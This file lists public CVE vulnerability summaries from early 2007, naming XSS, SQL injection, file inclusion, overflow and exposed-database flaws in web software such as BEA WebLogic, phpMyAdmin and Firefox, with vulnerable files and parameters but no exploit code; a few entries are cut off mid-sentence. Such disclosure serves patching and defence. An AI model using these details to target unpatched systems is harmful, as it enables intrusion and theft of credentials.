[CVE-2007-0807] Cross-site scripting (XSS) vulnerability in info.php in flashChat 4.7.8 allows remote attackers to inject arbitrary web script or HTML via a channel title (aka room name) that is not properly handled by the "who's online" feature.
[CVE-2007-0801] The nsExternalAppHandler::SetUpTempFile function in Mozilla Firefox 1.5.0.9 creates temporary files with predictable filenames based on creation time, which allows remote attackers to execute arbitrary web script or HTML via a crafted XMLHttpRequest.
[CVE-2007-0798] Multiple cross-site scripting (XSS) vulnerabilities in Ublog Reload 1.0.5 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) login.asp
[CVE-2007-0791] Cross-site scripting (XSS) vulnerability in Atom feeds in Bugzilla 2.20.3, 2.22.1, and 2.23.3, and earlier versions down to 2.20.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-0788] Cross-site scripting (XSS) vulnerability in MediaWiki 1.9.x before 1.9.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "sortable tables JavaScript."
[CVE-2007-0779] GUI overlay vulnerability in Mozilla Firefox 1.5.x before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8 allows remote attackers to spoof certain user interface elements, such as the host name or security indicators, via the CSS3 hotspot property with a large, transparent, custom cursor.
[CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
[CVE-2007-0769] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in register.php in Phorum 5.1.18 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the vendor disputes this vulnerability, stating that "The characters are escaped properly."
[CVE-2007-0768] Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information.
[CVE-2007-0767] Cross-site scripting (XSS) vulnerability in the core in Phorum before 5.1.18 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-0763] Cross-site scripting (XSS) vulnerability in the news comment functionality in F3Site 2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the Autor field.
[CVE-2007-0747] load_webdav in Apple Mac OS X 10.3.9 through 10.4.9 does not properly clean the environment when mounting a WebDAV filesystem, which allows local users to gain privileges by setting unspecified environment variables.
[CVE-2007-0742] The WebFoundation framework in Apple Mac OS X 10.3.9 and earlier allows subdomain cookies to be accessed by the parent domain, which allows remote attackers to obtain sensitive information.
[CVE-2007-0735] Use-after-free vulnerability in Libinfo in Apple Mac OS X 10.3.9 through 10.4.9 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors involving crafted web pages that trigger certain error conditions that are not properly reported in certain circumstances, resulting in accessing deallocated memory.
[CVE-2007-0724] The IOKit HID interface in Apple Mac OS X 10.3.9 and 10.4 through 10.4.8 does not sufficiently limit access to certain controls, which allows local users to gain privileges by using HID device events to read keystrokes from the console.
[CVE-2007-0706] Cross-zone scripting vulnerability in Darksky RSS bar for Internet Explorer before 1.29, RSS bar for Sleipnir before 1.29, and RSS bar for unDonut before 1.29 allows remote attackers to bypass Web content zone restrictions via certain script contained in RSS data. NOTE: some of these details are obtained from third party information.
[CVE-2007-0705] Cross-zone scripting vulnerability in Sleipnir 2.49 and earlier, and Portable Sleipnir 2.45 and earlier, allows remote attackers to bypass Web content zone restrictions via certain script contained in RSS data. NOTE: some of these details are obtained from third party information.
[CVE-2007-0703] PHP remote file inclusion vulnerability in library/StageLoader.php in WebBuilder 2.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[core][module_path] parameter.
[CVE-2007-0700] Directory traversal vulnerability in index.php in Guernion Sylvain Portail Web Php (aka Gsylvain35 Portail Web, PwP) allows remote attackers to read arbitrary files via a .. (dot dot) in the page parameter. NOTE: this issue was later reported for 2.5.1.1.
[CVE-2007-0699] PHP remote file inclusion vulnerability in includes/includes.php in Guernion Sylvain Portail Web Php (aka Gsylvain35 Portail Web, PwP) before 2.5.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the site_path parameter.
[CVE-2007-0696] Cross-site scripting (XSS) vulnerability in error messages in Free LAN In(tra|ter)net Portal (FLIP) before 1.0-RC3 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters, different vectors than CVE-2007-0611.
[CVE-2007-0694] Cross-site scripting (XSS) vulnerability in footer.php in DGNews 2.1 allows remote attackers to inject arbitrary web script or HTML via the copyright parameter.
[CVE-2007-0675] A certain ActiveX control in sapi.dll (aka the Speech API) in Speech Components in Microsoft Windows Vista, when the Speech Recognition feature is enabled, allows user-assisted remote attackers to delete arbitrary files, and conduct other unauthorized activities, via a web page with an embedded sound object that contains voice commands to an enabled microphone, allowing for interaction with Windows Explorer.
[CVE-2007-0661] Intel Enterprise Southbridge 2 Baseboard Management Controller (BMC), Intel Server Boards 5000XAL, S5000PAL, S5000PSL, S5000XVN, S5000VCL, S5000VSA, SC5400RA, and OEM Firmware for Intel Enterprise Southbridge Baseboard Management Controller before 20070119, when Intelligent Platform Management Interface (IPMI) is enabled, allow remote attackers to connect and issue arbitrary IPMI commands, possibly triggering a denial of service.
[CVE-2007-0660] Cross-site scripting (XSS) vulnerability in the IFrame module before 03.02.01 for DotNetNuke (DNN) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "Pass through values."
[CVE-2007-0651] Multiple cross-site scripting (XSS) vulnerabilities in MailEnable Professional before 2.37 allow remote attackers to inject arbitrary JavaScript via (1) e-mail messages and (2) the ID parameter to (a) right.asp, (b) Forms/MAI/list.asp, and (c) Forms/VCF/list.asp in mewebmail/base/default/lang/EN/.
[CVE-2007-0649] Variable overwrite vulnerability in interface/globals.php in OpenEMR 2.8.2 and earlier allows remote attackers to overwrite arbitrary program variables and conduct other unauthorized activities, such as (a) remote file inclusion attacks via the srcdir parameter in custom/import_xml.php or (b) cross-site scripting (XSS) attacks via the rootdir parameter in interface/login/login_frame.php, via vectors associated with extract operations on the (1) POST and (2) GET superglobal arrays. NOTE: this issue was originally disputed before the extract behavior was identified in post-disclosure analysis. Also, the original report identified "Open Conference Systems," but this was an error.
[CVE-2007-0629] The www_purgeList method in Plain Black WebGUI before 7.3.8 does not properly check user permissions, which allows attackers to delete unauthorized assets. NOTE: some of these details are obtained from third party information.
[CVE-2007-0628] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Access Manager 6.1, 6.2, 6 2005Q1 (6.3), and 7 2005Q4 (7.0) before 20070129 allow remote attackers to inject arbitrary web script or HTML via the (1) goto or (2) gx-charset parameter. NOTE: some of these details are obtained from third party information.
[CVE-2007-0620] download.php in FD Script 1.3.2 and earlier allows remote attackers to read source of files under the web document root with certain extensions, including .php, via a relative pathname in the fname parameter, as demonstrated by downloading config.php.
[CVE-2007-0611] Multiple cross-site scripting (XSS) vulnerabilities in Free LAN In(tra|ter)net Portal (FLIP) before 1.0-RC2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in (1) inc.page.php and (2) inc.text.php.
[CVE-2007-0610] Cross-site scripting (XSS) vulnerability in the mailform feature in CMSimple 2.7 fix1 allows remote attackers to inject arbitrary web script or HTML via the sender parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-0607] W-Agora (Web-Agora) 4.2.1, when register_globals is enabled, stores globals.inc under the web document root with insufficient access control, which allows remote attackers to obtain application path information via a direct request.
[CVE-2007-0605] Cross-site scripting (XSS) vulnerability in picture.php in Advanced Guestbook 2.4.2 allows remote attackers to inject arbitrary web script or HTML via the picture parameter.
[CVE-2007-0604] Cross-site scripting (XSS) vulnerability in Movable Type (MT) before 3.34 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the MTCommentPreviewIsStatic tag, which can open the "comment entry screen," a different vulnerability than CVE-2007-0231.
[CVE-2007-0595] Cross-site scripting (XSS) vulnerability in search in High 5 Review Site allows remote attackers to inject arbitrary web script or HTML via the q parameter (aka the search box).
[CVE-2007-0594] Siteman 2.0.x2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing password hashes via a direct request for db/siteman/users.MYD.
[CVE-2007-0593] Siteman 1.1.11 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing password hashes via a direct request for data/members.txt.
[CVE-2007-0592] Cross-site scripting (XSS) vulnerability in EzDatabase 2.1.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to admin/login.php and the Admin Panel Database.
[CVE-2007-0590] Cross-site scripting (XSS) vulnerability in busca2.asp in Forum Livre 1.0 allows remote attackers to inject arbitrary web script or HTML via the palavra parameter.
[CVE-2007-0585] include/debug.php in Webfwlog 0.92 and earlier, when register_globals is enabled, allows remote attackers to obtain source code of files via the conffile parameter. NOTE: some of these details are obtained from third party information. It is likely that this issue can be exploited to conduct directory traversal attacks.
[CVE-2007-0583] Multiple cross-site scripting (XSS) vulnerabilities in HTTP Commander 6.0, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) LogoffMessage parameter to logofflast.aspx or the (2) txtUsername parameter to Default.aspx. NOTE: the provenance of this information is unknown.
[CVE-2007-0579] Unspecified vulnerability in the calendar component in Horde Groupware Webmail Edition before 1.0, and Groupware before 1.0, allows remote attackers to include certain files via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2007-0574] SQL injection vulnerability in rss/show_webfeed.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.40 allows remote attackers to execute arbitrary SQL commands via the wcHeadlines parameter, a different vector than CVE-2006-4715. NOTE: the provenance of this information is unknown.
[CVE-2007-0567] Cross-site scripting (XSS) vulnerability in admin.php in Interactive-Scripts.Com PHP Membership Manager 1.5 allows remote attackers to inject arbitrary web script or HTML via the _p parameter.
[CVE-2007-0563] Multiple cross-site scripting (XSS) vulnerabilities in Symantec Web Security (SWS) before 3.0.1.85 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) error messages and (2) blocked page messages produced by SWS.
[CVE-2007-0553] Multiple cross-site scripting (XSS) vulnerabilities in index.inc.php in PHProxy before 0.5 beta 2 allow remote attackers to inject arbitrary web script or HTML via the (1) data[realm] and (2) _url parameters, different vectors than CVE-2004-2604. NOTE: some of these details are obtained from third party information.
[CVE-2007-0552] Cross-site scripting (XSS) vulnerability in install/default/error404.html in Oh no! Not another CMS (Onnac) 0.0.8.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the error_url parameter.
[CVE-2007-0550] Cross-site scripting (XSS) vulnerability in search.php in 212cafeBoard 0.08 Beta allows remote attackers to inject arbitrary web script or HTML via keyword parameter.
[CVE-2007-0549] Cross-site scripting (XSS) vulnerability in list3.php in 212cafeBoard 6.30 Beta allows remote attackers to inject arbitrary web script or HTML via the user parameter.
[CVE-2007-0547] Cross-site scripting (XSS) vulnerability in CGI-RESCUE WebFORM 4.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-0546] Toxiclab Shoutbox 1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db.mdb.
[CVE-2007-0545] Maxtricity Tagger 0.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for tagger.mdb.
[CVE-2007-0544] Cross-site scripting (XSS) vulnerability in private.php in MyBB (aka MyBulletinBoard) allows remote authenticated users to inject arbitrary web script or HTML via the Subject field, a different vector than CVE-2006-2949.
[CVE-2007-0543] ZixForum 1.14 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for Zixforum.mdb. NOTE: a followup post suggests that this issue only occurs if the administrator does not properly follow installation directions.
[CVE-2007-0542] Cross-site scripting (XSS) vulnerability in show.php in 212cafe Guestbook 4.00 beta allows remote attackers to inject arbitrary web script or HTML via the user parameter.
[CVE-2007-0534] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Project issue tracking 4.7.0 through 5.x before 20070123 and (2) Project 4.6.0 through 5.x before 20070123 modules for Drupal allow remote authenticated users to inject arbitrary web script or HTML via (a) certain "fields on project nodes" or (b) "certain project-specific settings regarding issue tracking."
[CVE-2007-0533] The AToZed IntraWeb component 8.0 and earlier for Borland Delphi and Kylix, and IntraWeb 9.0 before build (9.0.12), allows remote attackers to cause a denial of service (thread hang or CPU consumption) via a crafted HTTP request, related to the OnBeforeDispatch function in the TIWServerController object.
[CVE-2007-0532] Tuan Do Uploader (aka php-uploader) 6 beta 1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the administrator password hash via a direct request for userdata/user_1.txt.
[CVE-2007-0531] PHP remote file inclusion vulnerability in includes/login.php in FreeWebShop 2.2.3 and 2.2.4 before 20070123 allows remote attackers to execute arbitrary PHP code via a URL in the lang_file parameter.
[CVE-2007-0529] Cross-site scripting (XSS) vulnerability in index.html (aka the administration page) in PHP Link Directory (phpLD) 3.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted link, which is triggered when the administrator uses the "Validate Links" functionality.
[CVE-2007-0528] The admin web console implemented by the Centrality Communications (aka Aredfox) PA168 chipset and firmware 1.54 and earlier, as provided by various IP phones, does not require passwords or authentication tokens when using HTTP, which allows remote attackers to connect to existing superuser sessions and obtain sensitive information (passwords and configuration data).
[CVE-2007-0527] SQL injection vulnerability in the is_remembered function in class.login.php in Website Baker 2.6.5 and earlier allows remote attackers to execute arbitrary SQL commands via the REMEMBER_KEY cookie parameter. NOTE: some of these details are obtained from third party information.
[CVE-2007-0526] Multiple cross-site scripting (XSS) vulnerabilities in Bitweaver 1.3.1 allow remote attackers to inject arbitrary web script or HTML via the URL (PATH_INFO) to (1) articles/edit.php, (2) articles/list.php, (3) blogs/list_blogs.php, or (4) blogs/rankings.php.
[CVE-2007-0525] Multiple buffer overflows in Nickolas Grigoriadis Mini Web server (MiniWebsvr) before 0.05 have unknown impact and attack vectors.
[CVE-2007-0519] Cross-site scripting (XSS) vulnerability in memcp.php in XMB U2U Instant Messenger allows remote authenticated users to inject arbitrary web script or HTML via the recipient field.
[CVE-2007-0518] Scriptsez Smart PHP Subscriber (aka subscribe) stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain encoded passwords via a direct request for pwd.txt.
[CVE-2007-0517] Scriptsez Random PHP Quote 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain password information via a direct request for pwd.txt.
[CVE-2007-0514] Multiple cross-site scripting (XSS) vulnerabilities in multiple Hitachi Web Server, uCosminexus, and Cosminexus products before 20070124 allow remote attackers to inject arbitrary web script or HTML via (1) HTTP Expect headers or (2) image maps.
[CVE-2007-0502] SQL injection vulnerability in gallery.php in webSPELL 4.01.02 allows remote attackers to execute arbitrary SQL commands via the picID parameter, a different vector than CVE-2007-0492.
[CVE-2007-0496] PHP remote file inclusion vulnerability in lib/nl/nl.php in Neon Labs Website (nlws) 3.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the g_strRootDir parameter.
[CVE-2007-0492] Multiple SQL injection vulnerabilities in gallery.php in webSPELL 4.01.02 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id or (2) galleryID parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-0485] PHP remote file inclusion vulnerability in defines.php in WebChat 0.77 allows remote attackers to execute arbitrary PHP code via a URL in the WEBCHATPATH parameter.
[CVE-2007-0483] Multiple cross-site scripting (XSS) vulnerabilities in Enthusiast 3.1 allow remote attackers to inject arbitrary web script or HTML via the URI for (1) show_owned.php or (2) show_joined.php. NOTE: the provenance of this information is unknown.
[CVE-2007-0482] cgi-bin/main in Sun Ray Server Software 2.0 and 3.0 before 20070123 allows local users to obtain the utadmin password by reading a web server's log file, or by conducting a different, unspecified local attack.
[CVE-2007-0478] WebCore on Apple Mac OS X 10.3.9 and 10.4.10, as used in Safari, does not properly parse HTML comments in TITLE elements, which allows remote attackers to conduct cross-site scripting (XSS) attacks and bypass some XSS protection schemes by embedding certain HTML tags within an HTML comment.
[CVE-2007-0477] Cross-site scripting (XSS) vulnerability in Openads 2.0.x before 2.0.10, 2.3 before 2.3.31 (aka Max Media Manager before 0.3.31-alpha-pr2), and phpAdsNew/phpPgAds before 2.0.9-pr1 allows remote attackers to inject arbitrary web script or HTML via (1) the keyword parameter in admin-search.php and (2) affiliate-search.php. NOTE: this issue may overlap CVE-2007-0363.
[CVE-2007-0437] Multiple cross-site scripting (XSS) vulnerabilities in the sample Cache' Server Page (CSP) scripts in InterSystems Cache' allow remote attackers to inject arbitrary web script or HTML via (1) the TO parameter to loop.csp, (2) the VALUE parameter to cookie.csp, and (3) the PAGE parameter to showsource.csp in csp/samples/
[CVE-2007-0429] DivXBrowserPlugin (aka DivX Web Player) npdivx32.dll, as distributed with DivX Player 6.4.1, allows remote attackers to cause a denial of service (Internet Explorer 7 crash) by invoking the GoWindowed method for a certain instance of the ActiveX object.
[CVE-2007-0426] BEA WebLogic Portal 9.2, when running in a WebLogic Server clustered environment using WebLogic Portal entitlements, does not properly propagate entitlement policy changes if the changes are made on a managed server while the Administrative Server is unavailable, which might allow attackers to bypass intended restrictions.
[CVE-2007-0425] Unspecified vulnerability in BEA WebLogic Platform and Server 8.1 through 8.1 SP5, and JRockit 1.4.2 R4.5 and earlier, allows attackers to gain privileges via unspecified vectors, related to an "overflow condition," probably a buffer overflow.
[CVE-2007-0424] Unspecified vulnerability in the BEA WebLogic Server proxy plug-in for Netscape Enterprise Server before September 2006 allows remote attackers to cause a denial of service via certain requests that trigger errors that lead to a server being marked as unavailable, hosting web server failure, or CPU consumption.
[CVE-2007-0423] BEA WebLogic Portal 9.2 does not properly handle when an administrator deletes entitlements for a role, which causes other role entitlements to be "inadvertently affected," which has an unknown impact.
[CVE-2007-0422] BEA WebLogic Server 9.0, 9.1, and 9.2 Gold, when running on Solaris 9, allows remote attackers to cause a denial of service (server inaccessibility) via manipulated socket connections.
[CVE-2007-0421] BEA WebLogic Server 6.1 through 6.1 SP7, and 7.0 through 7.0 SP7 allows remote attackers to cause a denial of service (disk consumption) via requests containing malformed headers, which cause a large amount of data to be written to the server log.
[CVE-2007-0420] BEA WebLogic Server 9.0, 9.1, and 9.2 Gold allows remote attackers to obtain sensitive information via malformed HTTP requests, which reveal data from previous requests.
[CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
[CVE-2007-0418] BEA WebLogic Server 7.0 through 7.0 SP6, 8.1 through 8.1 SP5, 9.0, and 9.1 does not enforce a security policy that declares permissions for EJB methods that have array parameters, which allows remote attackers to obtain unauthorized access to these methods.
[CVE-2007-0417] BEA WebLogic Server 7.0 through 7.0 SP7, 8.1 through 8.1 SP5, 9.0, and 9.1, when using the WebLogic Server 6.1 compatibility realm, allows attackers to execute certain EJB container persistence operations with an administrative identity.
[CVE-2007-0416] The WSEE runtime (WS-Security runtime) in BEA WebLogic Server 9.0 and 9.1 does not verify credentials when decrypting client messages, which allows remote attackers to bypass application security.
[CVE-2007-0415] BEA WebLogic Server 8.1 through 8.1 SP5 does not properly enforce access control after a dynamic update and dynamic redeployment of an application that is implemented through exploded jars, which allows attackers to bypass intended access restrictions.
[CVE-2007-0414] BEA WebLogic Server 6.1 through 6.1 SP7, 7.0 through 7.0 SP6, 8.1 through 8.1 SP5, and 9.0 allows remote attackers to cause a denial of service (server hang) via certain requests that cause muxer threads to block when processing error pages.
[CVE-2007-0413] BEA WebLogic Server 8.1 through 8.1 SP5 stores cleartext data in a backup of config.xml after offline editing, which allows local users to obtain sensitive information by reading this backup file.
[CVE-2007-0412] BEA WebLogic Server 6.1 through 6.1 SP7, 7.0 through 7.0 SP7, and 8.1 through 8.1 SP5 allows remote attackers to read arbitrary files inside the class-path property via .ear or exploded .ear files that use the manifest class-path property to point to utility jar files.
[CVE-2007-0411] BEA WebLogic Server 8.1 through 8.1 SP5, 9.0, 9.1, and 9.2 Gold, when WS-Security is used, does not properly validate certificates, which allows remote attackers to conduct a man-in-the-middle (MITM) attack.
[CVE-2007-0410] Unspecified vulnerability in the thread management in BEA WebLogic 7.0 through 7.0 SP6, 8.1 through 8.1 SP5, 9.0, and 9.1, when T3 authentication is used, allows remote attackers to cause a denial of service (thread and system hang) via unspecified "sequences of events."
[CVE-2007-0409] BEA WebLogic 7.0 through 7.0 SP6, 8.1 through 8.1 SP4, and 9.0 initial release does not encrypt passwords stored in the JDBCDataSourceFactory MBean Properties, which allows local administrative users to read the cleartext password.
[CVE-2007-0408] BEA WebLogic Server 8.1 through 8.1 SP4 does not properly validate client certificates when reusing cached connections, which allows remote attackers to obtain access via an untrusted X.509 certificate.
[CVE-2007-0407] Cross-site scripting (XSS) vulnerability in Operation/User.pm in Plain Black WebGUI before 7.3.5 (beta) allows remote attackers to inject arbitrary web script or HTML via the username parameter during anonymous registration, a different vector than CVE-2007-0308. NOTE: it is possible that a separate "WikiPage titles" issue was also fixed.
[CVE-2007-0402] Cross-site scripting (XSS) vulnerability in admin/edit_member.php in Easebay Resources Paypal Subscription Manager allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2007-0400] Cross-site scripting (XSS) vulnerability in admin/memberlist.php in Easebay Resources Login Manager 3.0 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.
[CVE-2007-0399] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Simple Machines Forum (SMF) 1.1 RC3 allow remote authenticated users to inject arbitrary web script or HTML via the (1) recipient or (2) BCC field when selecting send in a pm action.
[CVE-2007-0398] Multiple cross-site scripting (XSS) vulnerabilities in forum.php3 in Arnaud Guyonne (aka Arnotic) a-forum allow remote attackers to inject arbitrary web script or HTML via the (1) Sujet or (2) Pseudo field.
[CVE-2007-0390] Cross-site scripting (XSS) vulnerability in index.php in sabros.us 1.7 allows remote attackers to inject arbitrary web script or HTML via the tag parameter.
[CVE-2007-0387] SQL injection vulnerability in models/category.php in the Weblinks component for Joomla! SVN 20070118 (com_weblinks) allows remote attackers to execute arbitrary SQL commands via the catid parameter.
[CVE-2007-0384] Cross-site scripting (XSS) vulnerability in preview in the reviews section in PostNuke 0.764 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-0379] Cross-site scripting (XSS) vulnerability in DocMan 1.3 RC2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-0377] Multiple SQL injection vulnerabilities in Xoops 2.0.16 allow remote attackers to execute arbitrary SQL commands via (1) the id parameter in kernel/group.php in core, (2) the lid parameter in class/table_broken.php in the Weblinks module, and other unspecified vectors.
[CVE-2007-0376] Cross-site scripting (XSS) vulnerability in Virtuemart 1.0.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-0365] Multiple cross-site scripting (XSS) vulnerabilities in All In One Control Panel (AIOCP) 1.3.009 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this is probably a different vulnerability than CVE-2006-5830.
[CVE-2007-0364] Multiple cross-site scripting (XSS) vulnerabilities in nicecoder.com INDEXU 5.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) error_msg parameter to (a) suggest_category.php
[CVE-2007-0363] Cross-site scripting (XSS) vulnerability in admin-search.php in (1) Openads for PostgreSQL (aka phpPgAds) before 2.0.10 and (2) Openads (aka phpAdsNew) before 2.0.10 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2007-0362] Cross-site scripting (XSS) vulnerability in the RSS feed component in FreshReader before 1.0.07010600 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to tag attributes.
[CVE-2007-0357] Directory traversal vulnerability in the AVM IGD CTRL Service in Fritz!DSL 02.02.29 allows remote attackers to read arbitrary files via ..%5C (URL-encoded dot dot backslash) sequences in a URI requested from the AR7 webserver.
[CVE-2007-0353] Cross-site scripting (XSS) vulnerability in (1) index.php and (2) login.php in myBloggie 2.1.5 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO string.
[CVE-2007-0342] WebCore in Apple WebKit build 18794 allows remote attackers to cause a denial of service (null dereference and application crash) via a TD element with a large number in the ROWSPAN attribute, as demonstrated by a crash of OmniWeb 5.5.3 on Mac OS X 10.4.8, a different vulnerability than CVE-2006-2019.
[CVE-2007-0341] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.1 and earlier, when Microsoft Internet Explorer 6 is used, allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in a CSS style in the convcharset parameter to the top-level URI, a different vulnerability than CVE-2005-0992.
[CVE-2007-0331] Cross-site scripting (XSS) vulnerability in liens.php3 in liens_dynamiques 2.1 allows remote attackers to inject arbitrary web script or HTML by using the ajouter=1 query string and the add menu.
[CVE-2007-0325] Multiple buffer overflows in the Trend Micro OfficeScan Web-Deployment SetupINICtrl ActiveX control in OfficeScanSetupINI.dll, as used in OfficeScan 7.0 before Build 1344, OfficeScan 7.3 before Build 1241, and Client / Server / Messaging Security 3.0 before Build 1197, allow remote attackers to execute arbitrary code via a crafted HTML document.
[CVE-2007-0321] Buffer overflow in the Update Service Agent ActiveX Control in isusweb.dll for Macrovision FLEXnet Connect (formerly InstallShield Update Service) allows remote attackers to execute arbitrary code via the Download method.
[CVE-2007-0320] Multiple buffer overflows in (a) an ActiveX control (iftw.dll) and (b) Netscape plug-in (npiftw32.dll) for Macrovision (formerly InstallShield) InstallFromTheWeb allow remote attackers to execute arbitrary code via crafted HTML documents.
[CVE-2007-0312] wcSimple Poll stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain password hashes via a direct request for password.txt.
[CVE-2007-0308] Cross-site scripting (XSS) vulnerability in Plain Black WebGUI before 7.3.4 (beta) allows remote attackers to inject arbitrary web script or HTML via Wiki Page titles.
[CVE-2007-0305] SQL injection vulnerability in etkinlikbak.asp in Okul Web Otomasyon Sistemi 4.0.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2007-0302] Multiple cross-site scripting (XSS) vulnerabilities in InstantASP 4.1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) SessionID parameter to (a) Logon.aspx, and the (2) Username and (3) Update parameters to (b) Members1.aspx.
[CVE-2007-0301] PHP remote file inclusion vulnerability in _admin/admin_menu.php in FdWeB Espace Membre 2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path parameter.
[CVE-2007-0290] Multiple unspecified vulnerabilities in Oracle E-Business Suite and Applications 11.5.10CU2 have unknown impact and attack vectors related to (1) Application Object Library (APPS01), (2) Human Resources (APPS03), (3) Payables (APPS04), (4) Trading Community Architecture (APPS05), and (5) Web Applications Desktop Integrator (APPS06).
[CVE-2007-0275] Cross-site scripting (XSS) vulnerability in Oracle Reports Web Cartridge (RWCGI60) in the Workflow Cartridge component, as used in Oracle Database 9.2.0.8, 10.1.0.5, and 10.2.0.3
[CVE-2007-0266] SQL injection vulnerability in boxx/ShowAppendix.asp in Ezboxx Portal System Beta 0.7.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the iid parameter.
[CVE-2007-0265] Multiple cross-site scripting (XSS) vulnerabilities in Ezboxx Portal System Beta 0.7.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the pic parameter to custom/piczoom.asp, (2) the nocatname parameter to boxx/user-upload.asp, or (3) the iid parameter to indexes/newscomments.asp.
[CVE-2007-0258] Cross-site scripting (XSS) vulnerability in index.php in (1) Fastilo 2.0 and (2) Open Solution Quick.Cart 2.0 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: some of these details are obtained from third party information.
[CVE-2007-0249] Cross-site scripting (XSS) vulnerability in index.php in Nwom topsites 3.0 allows remote attackers to inject arbitrary web script or HTML via the o parameter.
[CVE-2007-0246] plugins/scmcvs/www/cvsweb.php in the CVSWeb CGI in GForge 4.5.16 before 20070524, aka gforge-plugin-scmcvs, allows remote attackers to execute arbitrary commands via shell metacharacters in the PATH_INFO.
[CVE-2007-0240] Cross-site scripting (XSS) vulnerability in Zope 2.10.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in a HTTP GET request.
[CVE-2007-0231] Cross-site scripting (XSS) vulnerability in Movable Type (MT) 3.33, when nofollow is disabled and unmoderated comments are enabled, allows remote attackers to inject arbitrary web script or HTML via the Comments field.
[CVE-2007-0225] Cross-site scripting (XSS) vulnerability in shopcustadmin.asp in VP-ASP Shopping Cart 6.09 and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2007-0220] Cross-site scripting (XSS) vulnerability in Outlook Web Access (OWA) in Microsoft Exchange Server 2000 SP3, and 2003 SP1 and SP2 allows remote attackers to execute arbitrary scripts, spoof content, or obtain sensitive information via certain UTF-encoded, script-based e-mail attachments, involving an "incorrectly handled UTF character set label".
[CVE-2007-0204] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.9.2-rc1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2007-0196] SQL injection vulnerability in admin_check_user.asp in Motionborg Web Real Estate 2.1 and earlier allows remote attackers to execute arbitrary SQL commands via the username field (txtUserName parameter) and possibly other parameters. NOTE: some details were obtained from third party information.
[CVE-2007-0191] Cross-site scripting (XSS) vulnerability in admin.php in MKPortal allows remote attackers to inject arbitrary web script or HTML via two certain fields in a contents_new operation in the ad_contents section.
[CVE-2007-0186] Multiple cross-site scripting (XSS) vulnerabilities in F5 FirePass SSL VPN allow remote attackers to inject arbitrary web script or HTML via (1) the xcho parameter to my.logon.php3
